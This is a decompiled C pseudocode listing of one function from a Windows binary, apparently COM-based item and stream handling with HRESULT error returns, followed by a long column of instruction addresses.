				intOrPtr* _t662;
				signed int _t664;
				signed int* _t667;
				signed int _t668;
				signed int _t669;
				signed int _t670;
				intOrPtr _t671;
				signed int _t672;
				signed int _t673;
				signed int _t674;
				intOrPtr _t675;
				intOrPtr* _t676;
				signed int _t677;
				void* _t678;

				E00413954(E0041A132, _t678);
				_t664 =  *(_t678 + 0x18);
				_t658 = __ecx;
				 *((intOrPtr*)(_t678 - 0x30)) = __ecx;
				if(E0040D7CC(_t664) == 0) {
					L81:
					_t373 = 0x80004001;
					L114:
					 *[fs:0x0] =  *((intOrPtr*)(_t678 - 0xc));
					return _t373;
				}
				E00402155(_t678 - 0x2c);
				 *((intOrPtr*)(_t678 - 0x2c)) = 0x41b6c8;
				 *(_t678 - 4) = 0;
				 *((intOrPtr*)(_t678 - 0x50)) = 0;
				E00413310(_t678 - 0x4c);
				 *(_t678 - 4) = 1;
				E0040640D(_t678 - 0x50,  *(_t678 + 8));
				 *(_t678 + 8) = 0;
				if( *((intOrPtr*)(_t664 + 0x30)) <= 0) {
					L19:
					_t535 =  *( *(_t678 + 0x18) + 8);
					 *(_t678 - 0x18) = _t535;
					E0040ACC4(_t678 - 0xf8);
					 *(_t678 - 4) = 4;
					E0040B99B(_t678 - 0xa8);
					 *(_t678 - 4) = 5;
					E0040B63C( *(_t678 + 0x18), _t678 - 0xf8);
					if( *_t658 == 0) {
						L21:
						E004042D6();
						_t382 =  *(_t658 + 0x74);
						_t667 = _t658 + 0x74;
						if(_t382 != 0) {
							 *((intOrPtr*)( *_t382 + 8))(_t382);
							 *_t667 =  *_t667 & 0x00000000;
						}
						if( *((char*)(_t658 + 0x68)) != 0) {
							_push(0x88);
							_t504 = E00403A76();
							 *(_t678 + 8) = _t504;
							 *(_t678 - 4) = 6;
							if(_t504 == 0) {
								_t505 = 0;
								__eflags = 0;
							} else {
								_t505 = E0040B860(_t504);
							}
							 *(_t678 - 4) = 5;
							 *((intOrPtr*)(_t658 + 0x6c)) = _t505;
							E0040640D(_t667, _t505);
							_t507 =  *((intOrPtr*)(_t658 + 0x6c));
							if(_t507 == 0) {
								_t508 = 0;
								__eflags = 0;
							} else {
								_t508 = _t507 + 4;
							}
							 *((intOrPtr*)(_t658 + 0x70)) = _t508;
						}
						_t668 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t658 + 0x70))))))(_t678 - 0xf8);
						_t700 = _t668;
						if(_t668 == 0) {
							 *(_t678 - 0x10) =  *(_t678 - 0x10) & 0x00000000;
							__eflags = _t535;
							if(__eflags <= 0) {
								L50:
								E0040B96F(_t658 + 4, __eflags, _t678 - 0xf8);
								 *_t658 = 1;
								L51:
								 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t658 + 0x70)))) + 4))();
								_t669 = 0;
								__eflags =  *(_t678 - 0x18);
								 *((intOrPtr*)(_t678 - 0x34)) = 0;
								 *(_t678 + 0x10) = 0;
								 *(_t678 - 0x14) = 0;
								if( *(_t678 - 0x18) <= 0) {
									L105:
									E0040A402(_t678 - 0xf8,  *((intOrPtr*)( *((intOrPtr*)(_t678 - 0xb0)))), _t678 - 0x58, _t678 - 0xfc);
									__eflags =  *((char*)(_t658 + 0x68));
									if( *((char*)(_t658 + 0x68)) != 0) {
										 *((intOrPtr*)( *((intOrPtr*)(_t658 + 0x6c)) + 0x70)) =  *((intOrPtr*)(_t678 - 0x58));
									}
									__eflags =  *(_t678 - 0x18) - _t669;
									if( *(_t678 - 0x18) != _t669) {
										E004032A8(_t678 - 0x94, 4);
										 *((intOrPtr*)(_t678 - 0x94)) = 0x41b6b8;
										 *(_t678 - 4) = 0x1d;
										E00404327(_t678 - 0x94,  *(_t678 - 0x24));
										_t670 = 0;
										__eflags =  *(_t678 - 0x24);
										if( *(_t678 - 0x24) <= 0) {
											L112:
											_t660 =  *(_t658 + 0x74);
											 *((intOrPtr*)(_t678 - 0x54)) =  *((intOrPtr*)(_t678 + 0x1c));
											_t668 =  *((intOrPtr*)( *_t660 + 0xc))(_t660,  *((intOrPtr*)(_t678 - 0x88)), 0,  *(_t678 - 0x24), _t678 - 0x54, 0, 1,  *((intOrPtr*)(_t678 + 0x20)));
											 *(_t678 - 4) = 5;
											E004042AD(_t678 - 0x94);
											 *(_t678 - 4) = 0x1e;
											E004042AD(_t678 - 0xa8);
											 *(_t678 - 4) = 1;
											E004099BC(_t678 - 0xf8, __eflags);
											 *(_t678 - 4) =  *(_t678 - 4) & 0x00000000;
											E0040B845(_t678 - 0x50);
											_t366 = _t678 - 4;
											 *_t366 =  *(_t678 - 4) | 0xffffffff;
											__eflags =  *_t366;
											E0040A5AC(_t678 - 0x2c);
											goto L113;
										} else {
											goto L111;
										}
										do {
											L111:
											E004039DF(_t678 - 0x94,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t678 - 0x20)) + _t670 * 4)))));
											_t670 = _t670 + 1;
											__eflags = _t670 -  *(_t678 - 0x24);
										} while (_t670 <  *(_t678 - 0x24));
										goto L112;
									} else {
										 *(_t678 - 4) = 0x1b;
										E004042AD(_t678 - 0xa8);
										 *(_t678 - 4) = 1;
										E004099BC(_t678 - 0xf8, __eflags);
										 *(_t678 - 4) =  *(_t678 - 4) & 0x00000000;
										DeleteCriticalSection(_t678 - 0x4c);
										E00403800(_t678 - 0x50);
										 *((intOrPtr*)(_t678 - 0x2c)) = 0x41b6c8;
										 *(_t678 - 4) = 0x1c;
										_t668 = 0;
										__eflags = 0;
										goto L109;
									}
								}
								_t661 =  *(_t678 + 0x18);
								 *(_t678 + 8) = 0;
								do {
									 *(_t678 + 0x18) =  *(_t678 + 0x18) & 0x00000000;
									_t671 =  *((intOrPtr*)( *((intOrPtr*)(_t661 + 0xc)) +  *(_t678 - 0x14) * 4));
									_t417 =  *((intOrPtr*)( *((intOrPtr*)( *(_t678 + 8) +  *((intOrPtr*)( *((intOrPtr*)(_t678 - 0x30)) + 0x84))))));
									 *(_t678 - 4) = 0x12;
									 *((intOrPtr*)( *_t417))(_t417, 0x41b298, _t678 + 0x18);
									_t419 =  *(_t678 + 0x18);
									__eflags = _t419;
									if(_t419 == 0) {
										L57:
										__eflags = _t419;
										 *(_t678 - 4) = 5;
										if(_t419 != 0) {
											 *((intOrPtr*)( *_t419 + 8))(_t419);
										}
										_t537 =  *(_t671 + 0x14);
										 *(_t678 + 8) =  *(_t678 + 8) + 4;
										_t672 =  *(_t671 + 0x18);
										E004032A8(_t678 - 0x6c, 4);
										 *((intOrPtr*)(_t678 - 0x6c)) = 0x41b68c;
										 *(_t678 - 4) = 0x17;
										E004032A8(_t678 - 0x80, 4);
										 *((intOrPtr*)(_t678 - 0x80)) = 0x41b68c;
										 *(_t678 - 4) = 0x18;
										E00404327(_t678 - 0x6c, _t537);
										_t423 = E00404327(_t678 - 0x80, _t672);
										__eflags = _t672;
										if(_t672 <= 0) {
											L61:
											 *(_t678 - 0x10) =  *(_t678 - 0x10) & 0x00000000;
											__eflags = _t537;
											if(_t537 <= 0) {
												goto L94;
											}
											_t675 =  *((intOrPtr*)(_t678 - 0x34));
											do {
												_t580 =  *(_t661 + 0x1c);
												_t652 = 0;
												__eflags = _t580;
												if(_t580 <= 0) {
													L83:
													_t429 = _t423 | 0xffffffff;
													__eflags = _t429;
													L84:
													__eflags = _t429;
													if(_t429 < 0) {
														_t581 =  *(_t661 + 0x30);
														_t653 = 0;
														__eflags = _t581;
														if(_t581 <= 0) {
															L90:
															_t430 = _t429 | 0xffffffff;
															__eflags = _t430;
															L91:
															__eflags = _t430;
															if(_t430 < 0) {
																 *(_t678 - 4) = 0x17;
																E004042AD(_t678 - 0x80);
																 *(_t678 - 4) = 5;
																E004042AD(_t678 - 0x6c);
																 *(_t678 - 4) = 0x19;
																E004042AD(_t678 - 0xa8);
																 *(_t678 - 4) = 1;
																E004099BC(_t678 - 0xf8, __eflags);
																 *(_t678 - 4) =  *(_t678 - 4) & 0x00000000;
																DeleteCriticalSection(_t678 - 0x4c);
																E00403800(_t678 - 0x50);
																 *((intOrPtr*)(_t678 - 0x2c)) = 0x41b6c8;
																 *(_t678 - 4) = 0x1a;
																E004042D6();
																 *(_t678 - 4) =  *(_t678 - 4) | 0xffffffff;
																E004042AD(_t678 - 0x2c);
																_t373 = 0x80004005;
																goto L114;
															}
															_t589 =  *((intOrPtr*)(_t678 + 0x14));
															goto L93;
														}
														_t441 =  *((intOrPtr*)(_t661 + 0x34));
														while(1) {
															__eflags =  *_t441 - _t675;
															if( *_t441 == _t675) {
																break;
															}
															_t653 = _t653 + 1;
															_t441 = _t441 + 4;
															__eflags = _t653 - _t581;
															if(_t653 < _t581) {
																continue;
															}
															goto L90;
														}
														_t430 = _t653;
														goto L91;
													}
													_t430 =  *( *((intOrPtr*)(_t661 + 0x20)) + 4 + _t429 * 8);
													_t589 =  *((intOrPtr*)(_t661 + 0x48));
													goto L93;
												}
												_t440 =  *((intOrPtr*)(_t661 + 0x20));
												while(1) {
													__eflags =  *_t440 - _t675;
													if( *_t440 == _t675) {
														break;
													}
													_t652 = _t652 + 1;
													_t440 = _t440 + 8;
													__eflags = _t652 - _t580;
													if(_t652 < _t580) {
														continue;
													}
													goto L83;
												}
												_t429 = _t652;
												goto L84;
												L93:
												_t423 = E004039DF(_t678 - 0x6c, _t589 + _t430 * 8);
												 *(_t678 - 0x10) =  *(_t678 - 0x10) + 1;
												_t675 = _t675 + 1;
												__eflags =  *(_t678 - 0x10) - _t537;
												 *((intOrPtr*)(_t678 - 0x34)) = _t675;
											} while ( *(_t678 - 0x10) < _t537);
											goto L94;
										} else {
											do {
												_t423 = E004039DF(_t678 - 0x80,  *((intOrPtr*)(_t661 + 0x48)) +  *(_t678 + 0x10) * 8);
												 *(_t678 + 0x10) =  *(_t678 + 0x10) + 1;
												_t672 = _t672 - 1;
												__eflags = _t672;
											} while (_t672 != 0);
											goto L61;
										}
									}
									_t595 =  *(_t671 + 0xc);
									__eflags = _t595 - 0xffffffff;
									 *(_t678 - 0x10) = _t595;
									if(_t595 > 0xffffffff) {
										__eflags = _t419;
										 *(_t678 - 4) = 5;
										if(_t419 != 0) {
											 *((intOrPtr*)( *_t419 + 8))(_t419);
										}
										 *(_t678 - 4) = 0x13;
										E004042AD(_t678 - 0xa8);
										 *(_t678 - 4) = 1;
										E004099BC(_t678 - 0xf8, __eflags);
										 *(_t678 - 4) =  *(_t678 - 4) & 0x00000000;
										DeleteCriticalSection(_t678 - 0x4c);
										E00403800(_t678 - 0x50);
										 *((intOrPtr*)(_t678 - 0x2c)) = 0x41b6c8;
										 *(_t678 - 4) = 0x14;
										_t538 = 0x80004001;
										L103:
										E004042D6();
										 *(_t678 - 4) =  *(_t678 - 4) | 0xffffffff;
										E004042AD(_t678 - 0x2c);
										_t373 = _t538;
										goto L114;
									}
									_t538 =  *((intOrPtr*)( *_t419 + 0xc))(_t419,  *((intOrPtr*)(_t671 + 0x10)),  *(_t678 - 0x10));
									__eflags = _t538;
									if(_t538 != 0) {
										_t453 =  *(_t678 + 0x18);
										 *(_t678 - 4) = 5;
										__eflags = _t453;
										if(_t453 != 0) {
											 *((intOrPtr*)( *_t453 + 8))(_t453);
										}
										 *(_t678 - 4) = 0x15;
										E004042AD(_t678 - 0xa8);
										 *(_t678 - 4) = 1;
										E004099BC(_t678 - 0xf8, __eflags);
										_t287 = _t678 - 4;
										 *_t287 =  *(_t678 - 4) & 0x00000000;
										__eflags =  *_t287;
										DeleteCriticalSection(_t678 - 0x4c);
										E00403800(_t678 - 0x50);
										 *((intOrPtr*)(_t678 - 0x2c)) = 0x41b6c8;
										 *(_t678 - 4) = 0x16;
										goto L103;
									}
									_t419 =  *(_t678 + 0x18);
									goto L57;
									L94:
									_t673 =  *(_t678 - 0x14);
									 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t678 - 0x30)) + 0x70)))) + 8))(_t673,  *((intOrPtr*)(_t678 - 0x60)),  *((intOrPtr*)(_t678 - 0x74)));
									 *(_t678 - 4) = 0x17;
									E004042AD(_t678 - 0x80);
									 *(_t678 - 4) = 5;
									E004042AD(_t678 - 0x6c);
									_t674 = _t673 + 1;
									__eflags = _t674 -  *(_t678 - 0x18);
									 *(_t678 - 0x14) = _t674;
								} while (_t674 <  *(_t678 - 0x18));
								_t658 =  *((intOrPtr*)(_t678 - 0x30));
								_t669 = 0;
								goto L105;
							} else {
								goto L34;
							}
							while(1) {
								L34:
								_t676 =  *((intOrPtr*)( *((intOrPtr*)( *(_t678 + 0x18) + 0xc)) +  *(_t678 - 0x10) * 4));
								 *(_t678 + 0x10) = 0;
								 *(_t678 + 8) = 0;
								_push(0);
								_push( *((intOrPtr*)(_t676 + 4)));
								 *(_t678 - 4) = 0xa;
								_push( *_t676);
								_t462 = E004063BD(_t678 + 0x10, _t678 + 8, __eflags);
								_t539 = _t462;
								__eflags = _t539;
								if(_t539 != 0) {
									break;
								}
								 *(_t678 - 0x14) =  *(_t678 - 0x14) & _t462;
								__eflags =  *((intOrPtr*)(_t676 + 0x14)) - 1;
								 *(_t678 - 4) = 0xd;
								if( *((intOrPtr*)(_t676 + 0x14)) != 1) {
									L40:
									__eflags =  *(_t678 + 8);
									if( *(_t678 + 8) == 0) {
										_t471 =  *(_t678 + 0x10);
										 *(_t678 - 4) = 5;
										__eflags = _t471;
										if(_t471 != 0) {
											 *((intOrPtr*)( *_t471 + 8))(_t471);
										}
										 *(_t678 - 4) = 0x10;
										E004042AD(_t678 - 0xa8);
										 *(_t678 - 4) = 1;
										E004099BC(_t678 - 0xf8, __eflags);
										 *(_t678 - 4) =  *(_t678 - 4) & 0x00000000;
										DeleteCriticalSection(_t678 - 0x4c);
										E00403800(_t678 - 0x50);
										 *((intOrPtr*)(_t678 - 0x2c)) = 0x41b6c8;
										 *(_t678 - 4) = 0x11;
										E004042D6();
										_t237 = _t678 - 4;
										 *_t237 =  *(_t678 - 4) | 0xffffffff;
										__eflags =  *_t237;
										E004042AD(_t678 - 0x2c);
										goto L81;
									}
									E0040640D(_t678 - 0x14,  *(_t678 + 8));
									__eflags =  *((char*)(_t658 + 0x68));
									if(__eflags != 0) {
										E0040A0DE( *((intOrPtr*)(_t658 + 0x6c)), _t678, __eflags,  *(_t678 + 8));
									}
									L43:
									_push(_t678 - 0x14);
									E0040BAB0(_t658 + 0x78);
									_t482 =  *(_t678 - 0x14);
									 *(_t678 - 4) = 0xa;
									__eflags = _t482;
									if(_t482 != 0) {
										 *((intOrPtr*)( *_t482 + 8))(_t482);
									}
									_t483 =  *(_t678 + 8);
									 *(_t678 - 4) = 9;
									__eflags = _t483;
									if(_t483 != 0) {
										 *((intOrPtr*)( *_t483 + 8))(_t483);
									}
									_t484 =  *(_t678 + 0x10);
									 *(_t678 - 4) = 5;
									__eflags = _t484;
									if(_t484 != 0) {
										 *((intOrPtr*)( *_t484 + 8))(_t484);
									}
									 *(_t678 - 0x10) =  *(_t678 - 0x10) + 1;
									__eflags =  *(_t678 - 0x10) -  *(_t678 - 0x18);
									if(__eflags < 0) {
										continue;
									} else {
										goto L50;
									}
								}
								__eflags =  *((intOrPtr*)(_t676 + 0x18)) - 1;
								if( *((intOrPtr*)(_t676 + 0x18)) != 1) {
									goto L40;
								}
								_t626 =  *(_t678 + 0x10);
								__eflags = _t626;
								if(_t626 == 0) {
									_t490 =  *(_t678 + 8);
									 *(_t678 - 4) = 9;
									__eflags = _t490;
									if(_t490 != 0) {
										 *((intOrPtr*)( *_t490 + 8))(_t490);
										_t626 =  *(_t678 + 0x10);
									}
									__eflags = _t626;
									 *(_t678 - 4) = 5;
									if(_t626 != 0) {
										 *((intOrPtr*)( *_t626 + 8))(_t626);
									}
									 *(_t678 - 4) = 0xe;
									E004042AD(_t678 - 0xa8);
									 *(_t678 - 4) = 1;
									E004099BC(_t678 - 0xf8, __eflags);
									 *(_t678 - 4) =  *(_t678 - 4) & 0x00000000;
									DeleteCriticalSection(_t678 - 0x4c);
									E00403800(_t678 - 0x50);
									 *((intOrPtr*)(_t678 - 0x2c)) = 0x41b6c8;
									 *(_t678 - 4) = 0xf;
									_t668 = 0x80004001;
									goto L109;
								}
								E0040640D(_t678 - 0x14, _t626);
								__eflags =  *((intOrPtr*)(_t658 + 0x68)) - _t539;
								if(__eflags != 0) {
									E0040A0B9( *((intOrPtr*)(_t658 + 0x6c)), _t678, __eflags,  *(_t678 + 0x10));
								}
								goto L43;
							}
							_t463 =  *(_t678 + 8);
							 *(_t678 - 4) = 9;
							__eflags = _t463;
							if(_t463 != 0) {
								 *((intOrPtr*)( *_t463 + 8))(_t463);
							}
							_t464 =  *(_t678 + 0x10);
							 *(_t678 - 4) = 5;
							__eflags = _t464;
							if(_t464 != 0) {
								 *((intOrPtr*)( *_t464 + 8))(_t464);
							}
							 *(_t678 - 4) = 0xb;
							E004042AD(_t678 - 0xa8);
							 *(_t678 - 4) = 1;
							E004099BC(_t678 - 0xf8, __eflags);
							 *(_t678 - 4) =  *(_t678 - 4) & 0x00000000;
							DeleteCriticalSection(_t678 - 0x4c);
							E00403800(_t678 - 0x50);
							 *((intOrPtr*)(_t678 - 0x2c)) = 0x41b6c8;
							 *(_t678 - 4) = 0xc;
							_t668 = _t539;
							goto L109;
						} else {
							 *(_t678 - 4) = 7;
							E004042AD(_t678 - 0xa8);
							 *(_t678 - 4) = 1;
							E004099BC(_t678 - 0xf8, _t700);
							 *(_t678 - 4) =  *(_t678 - 4) & 0x00000000;
							DeleteCriticalSection(_t678 - 0x4c);
							E00403800(_t678 - 0x50);
							 *((intOrPtr*)(_t678 - 0x2c)) = 0x41b6c8;
							 *(_t678 - 4) = 8;
							L109:
							E004042D6();
							 *(_t678 - 4) =  *(_t678 - 4) | 0xffffffff;
							E004042AD(_t678 - 0x2c);
							L113:
							_t373 = _t668;
							goto L114;
						}
					}
					_t510 = E0040B753(_t678 - 0xf8, _t658 + 4);
					asm("sbb al, al");
					_t512 =  ~_t510 + 1;
					 *((char*)(_t678 + 0xb)) = _t512;
					if(_t512 == 0) {
						goto L51;
					}
					goto L21;
				} else {
					_t540 =  *((intOrPtr*)(_t678 + 0x14));
					do {
						_push(0x18);
						_t513 = E00403A76();
						if(_t513 == 0) {
							_t662 = 0;
							__eflags = 0;
						} else {
							 *(_t513 + 4) =  *(_t513 + 4) & 0x00000000;
							 *_t513 = 0x41b6e8;
							_t662 = _t513;
						}
						 *((intOrPtr*)(_t678 - 0x34)) = _t662;
						if(_t662 != 0) {
							 *((intOrPtr*)( *_t662 + 4))(_t662);
						}
						_push(0x28);
						 *((intOrPtr*)(_t662 + 8)) = _t678 - 0x50;
						 *((intOrPtr*)(_t662 + 0x10)) =  *((intOrPtr*)(_t678 + 0xc));
						 *(_t662 + 0x14) =  *(_t678 + 0x10);
						 *((intOrPtr*)(_t678 + 0xc)) =  *((intOrPtr*)(_t678 + 0xc)) +  *_t540;
						 *(_t678 - 4) = 2;
						asm("adc [ebp+0x10], ecx");
						_t518 = E00403A76();
						if(_t518 == 0) {
							_t677 = 0;
							__eflags = 0;
						} else {
							 *(_t518 + 4) =  *(_t518 + 4) & 0x00000000;
							 *(_t518 + 8) =  *(_t518 + 8) & 0x00000000;
							 *_t518 = 0x41b6d8;
							_t677 = _t518;
						}
						 *(_t678 - 0x18) = _t677;
						if(_t677 != 0) {
							 *((intOrPtr*)( *_t677 + 4))(_t677);
						}
						_t34 = _t677 + 8; // 0x8
						 *(_t678 - 4) = 3;
						E0040640D(_t34, _t662);
						 *(_t677 + 0x18) =  *(_t677 + 0x18) & 0x00000000;
						 *(_t677 + 0x1c) =  *(_t677 + 0x1c) & 0x00000000;
						 *(_t677 + 0x20) =  *(_t677 + 0x20) & 0x00000000;
						 *((intOrPtr*)(_t677 + 0x10)) =  *_t540;
						 *((intOrPtr*)(_t677 + 0x14)) =  *((intOrPtr*)(_t540 + 4));
						_push(_t678 - 0x18);
						E0040A5E4(_t678 - 0x2c);
						_t523 =  *(_t678 - 0x18);
						 *(_t678 - 4) = 2;
						if(_t523 != 0) {
							 *((intOrPtr*)( *_t523 + 8))(_t523);
						}
						 *(_t678 - 4) = 1;
						if(_t662 != 0) {
							 *((intOrPtr*)( *_t662 + 8))(_t662);
						}
						 *(_t678 + 8) =  *(_t678 + 8) + 1;
						_t540 = _t540 + 8;
					} while ( *(_t678 + 8) <  *((intOrPtr*)( *(_t678 + 0x18) + 0x30)));
					_t658 =  *((intOrPtr*)(_t678 - 0x30));
					goto L19;
				}
			}



























































                              0x0040ad1e
                              0x0040ad2b
                              0x0040ad2f
                              0x0040ad33
                              0x0040ad3d
                              0x0040b2d7
                              0x0040b2d7
                              0x0040b605
                              0x0040b60b
                              0x0040b613
                              0x0040b613
                              0x0040ad46
                              0x0040ad4b
                              0x0040ad57
                              0x0040ad5a
                              0x0040ad5d
                              0x0040ad68
                              0x0040ad6c
                              0x0040ad74
                              0x0040ad79
                              0x0040ae60
                              0x0040ae69
                              0x0040ae6c
                              0x0040ae6f
                              0x0040ae7a
                              0x0040ae7e
                              0x0040ae8b
                              0x0040ae8f
                              0x0040ae97
                              0x0040aeb6
                              0x0040aeb9
                              0x0040aebe
                              0x0040aec1
                              0x0040aec6
                              0x0040aecb
                              0x0040aece
                              0x0040aece
                              0x0040aed5
                              0x0040aed7
                              0x0040aedc
                              0x0040aee2
                              0x0040aee7
                              0x0040aeeb
                              0x0040aef6
                              0x0040aef6
                              0x0040aeed
                              0x0040aeef
                              0x0040aeef
                              0x0040aefb
                              0x0040aeff
                              0x0040af02
                              0x0040af07
                              0x0040af0c
                              0x0040af13
                              0x0040af13
                              0x0040af0e
                              0x0040af0e
                              0x0040af0e
                              0x0040af15
                              0x0040af15
                              0x0040af26
                              0x0040af28
                              0x0040af2a
                              0x0040af73
                              0x0040af77
                              0x0040af79
                              0x0040b05f
                              0x0040b069
                              0x0040b06e
                              0x0040b071
                              0x0040b076
                              0x0040b079
                              0x0040b07b
                              0x0040b07e
                              0x0040b081
                              0x0040b084
                              0x0040b087
                              0x0040b4bf
                              0x0040b4d8
                              0x0040b4dd
                              0x0040b4e1
                              0x0040b4e9
                              0x0040b4e9
                              0x0040b4ec
                              0x0040b4ef
                              0x0040b556
                              0x0040b55b
                              0x0040b56e
                              0x0040b572
                              0x0040b579
                              0x0040b57b
                              0x0040b57e
                              0x0040b599
                              0x0040b59f
                              0x0040b5a9
                              0x0040b5c2
                              0x0040b5c4
                              0x0040b5c8
                              0x0040b5d3
                              0x0040b5d7
                              0x0040b5e2
                              0x0040b5e6
                              0x0040b5eb
                              0x0040b5f2
                              0x0040b5f7
                              0x0040b5f7
                              0x0040b5f7
                              0x0040b5fe
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0040b580
                              0x0040b580
                              0x0040b58e
                              0x0040b593
                              0x0040b594
                              0x0040b594
                              0x00000000
                              0x0040b4f1
                              0x0040b4f7
                              0x0040b4fb
                              0x0040b506
                              0x0040b50a
                              0x0040b50f
                              0x0040b517
                              0x0040b520
                              0x0040b525
                              0x0040b52c
                              0x0040b533
                              0x0040b533
                              0x00000000
                              0x0040b533
                              0x0040b4ef
                              0x0040b08d
                              0x0040b090
                              0x0040b093
                              0x0040b099
                              0x0040b09d
                              0x0040b0af
                              0x0040b0bd
                              0x0040b0c1
                              0x0040b0c3
                              0x0040b0c6
                              0x0040b0c8
                              0x0040b0f3
                              0x0040b0f3
                              0x0040b0f5
                              0x0040b0f9
                              0x0040b0fe
                              0x0040b0fe
                              0x0040b101
                              0x0040b104
                              0x0040b108
                              0x0040b110
                              0x0040b115
                              0x0040b121
                              0x0040b125
                              0x0040b12a
                              0x0040b135
                              0x0040b139
                              0x0040b142
                              0x0040b147
                              0x0040b149
                              0x0040b163
                              0x0040b163
                              0x0040b167
                              0x0040b169
                              0x00000000
                              0x00000000
                              0x0040b16f
                              0x0040b172
                              0x0040b172
                              0x0040b175
                              0x0040b177
                              0x0040b179
                              0x0040b2e5
                              0x0040b2e5
                              0x0040b2e5
                              0x0040b2e8
                              0x0040b2e8
                              0x0040b2ea
                              0x0040b2f8
                              0x0040b2fb
                              0x0040b2fd
                              0x0040b2ff
                              0x0040b310
                              0x0040b310
                              0x0040b310
                              0x0040b313
                              0x0040b313
                              0x0040b315
                              0x0040b44a
                              0x0040b44e
                              0x0040b456
                              0x0040b45a
                              0x0040b465
                              0x0040b469
                              0x0040b474
                              0x0040b478
                              0x0040b47d
                              0x0040b485
                              0x0040b48e
                              0x0040b493
                              0x0040b49d
                              0x0040b4a4
                              0x0040b4a9
                              0x0040b4b0
                              0x0040b4b5
                              0x00000000
                              0x0040b4b5
                              0x0040b31b
                              0x00000000
                              0x0040b31b
                              0x0040b301
                              0x0040b304
                              0x0040b304
                              0x0040b306
                              0x00000000
                              0x00000000
                              0x0040b308
                              0x0040b309
                              0x0040b30c
                              0x0040b30e
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0040b30e
                              0x0040b37e
                              0x00000000
                              0x0040b37e
                              0x0040b2ef
                              0x0040b2f3
                              0x00000000
                              0x0040b2f3
                              0x0040b17f
                              0x0040b182
                              0x0040b182
                              0x0040b184
                              0x00000000
                              0x00000000
                              0x0040b18a
                              0x0040b18b
                              0x0040b18e
                              0x0040b190
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0040b192
                              0x0040b2e1
                              0x00000000
                              0x0040b31e
                              0x0040b325
                              0x0040b32a
                              0x0040b32d
                              0x0040b32e
                              0x0040b331
                              0x0040b331
                              0x00000000
                              0x0040b14b
                              0x0040b14b
                              0x0040b158
                              0x0040b15d
                              0x0040b160
                              0x0040b160
                              0x0040b160
                              0x00000000
                              0x0040b14b
                              0x0040b149
                              0x0040b0ca
                              0x0040b0cd
                              0x0040b0d0
                              0x0040b0d3
                              0x0040b382
                              0x0040b384
                              0x0040b388
                              0x0040b38d
                              0x0040b38d
                              0x0040b396
                              0x0040b39a
                              0x0040b3a5
                              0x0040b3a9
                              0x0040b3ae
                              0x0040b3b6
                              0x0040b3bf
                              0x0040b3c4
                              0x0040b3cb
                              0x0040b3d2
                              0x0040b42c
                              0x0040b42f
                              0x0040b434
                              0x0040b43b
                              0x0040b440
                              0x00000000
                              0x0040b440
                              0x0040b0e6
                              0x0040b0e8
                              0x0040b0ea
                              0x0040b3d9
                              0x0040b3dc
                              0x0040b3e0
                              0x0040b3e2
                              0x0040b3e7
                              0x0040b3e7
                              0x0040b3f0
                              0x0040b3f4
                              0x0040b3ff
                              0x0040b403
                              0x0040b408
                              0x0040b408
                              0x0040b408
                              0x0040b410
                              0x0040b419
                              0x0040b41e
                              0x0040b425
                              0x00000000
                              0x0040b425
                              0x0040b0f0
                              0x00000000
                              0x0040b33a
                              0x0040b340
                              0x0040b34c
                              0x0040b352
                              0x0040b356
                              0x0040b35e
                              0x0040b362
                              0x0040b367
                              0x0040b368
                              0x0040b36b
                              0x0040b36b
                              0x0040b374
                              0x0040b377
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0040af7f
                              0x0040af7f
                              0x0040af88
                              0x0040af8d
                              0x0040af90
                              0x0040af93
                              0x0040af97
                              0x0040af9d
                              0x0040afa1
                              0x0040afa3
                              0x0040afa8
                              0x0040afaa
                              0x0040afac
                              0x00000000
                              0x00000000
                              0x0040afb2
                              0x0040afb5
                              0x0040afb9
                              0x0040afbd
                              0x0040afeb
                              0x0040afeb
                              0x0040afef
                              0x0040b270
                              0x0040b273
                              0x0040b277
                              0x0040b279
                              0x0040b27e
                              0x0040b27e
                              0x0040b287
                              0x0040b28b
                              0x0040b296
                              0x0040b29a
                              0x0040b29f
                              0x0040b2a7
                              0x0040b2b0
                              0x0040b2b5
                              0x0040b2bf
                              0x0040b2c6
                              0x0040b2cb
                              0x0040b2cb
                              0x0040b2cb
                              0x0040b2d2
                              0x00000000
                              0x0040b2d2
                              0x0040affb
                              0x0040b000
                              0x0040b004
                              0x0040b00c
                              0x0040b00c
                              0x0040b011
                              0x0040b017
                              0x0040b018
                              0x0040b01d
                              0x0040b020
                              0x0040b024
                              0x0040b026
                              0x0040b02b
                              0x0040b02b
                              0x0040b02e
                              0x0040b031
                              0x0040b035
                              0x0040b037
                              0x0040b03c
                              0x0040b03c
                              0x0040b03f
                              0x0040b042
                              0x0040b046
                              0x0040b048
                              0x0040b04d
                              0x0040b04d
                              0x0040b050
                              0x0040b056
                              0x0040b059
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0040b059
                              0x0040afbf
                              0x0040afc3
                              0x00000000
                              0x00000000
                              0x0040afc5
                              0x0040afc8
                              0x0040afca
                              0x0040b202
                              0x0040b205
                              0x0040b209
                              0x0040b20b
                              0x0040b210
                              0x0040b213
                              0x0040b213
                              0x0040b216
                              0x0040b218
                              0x0040b21c
                              0x0040b221
                              0x0040b221
                              0x0040b22a
                              0x0040b22e
                              0x0040b239
                              0x0040b23d
                              0x0040b242
                              0x0040b24a
                              0x0040b253
                              0x0040b258
                              0x0040b25f
                              0x0040b266
                              0x00000000
                              0x0040b266
                              0x0040afd4
                              0x0040afd9
                              0x0040afdc
                              0x0040afe4
                              0x0040afe4
                              0x00000000
                              0x0040afdc
                              0x0040b197
                              0x0040b19a
                              0x0040b19e
                              0x0040b1a0
                              0x0040b1a5
                              0x0040b1a5
                              0x0040b1a8
                              0x0040b1ab
                              0x0040b1af
                              0x0040b1b1
                              0x0040b1b6
                              0x0040b1b6
                              0x0040b1bf
                              0x0040b1c3
                              0x0040b1ce
                              0x0040b1d2
                              0x0040b1d7
                              0x0040b1df
                              0x0040b1e8
                              0x0040b1ed
                              0x0040b1f4
                              0x0040b1fb
                              0x00000000
                              0x0040af2c
                              0x0040af32
                              0x0040af36
                              0x0040af41
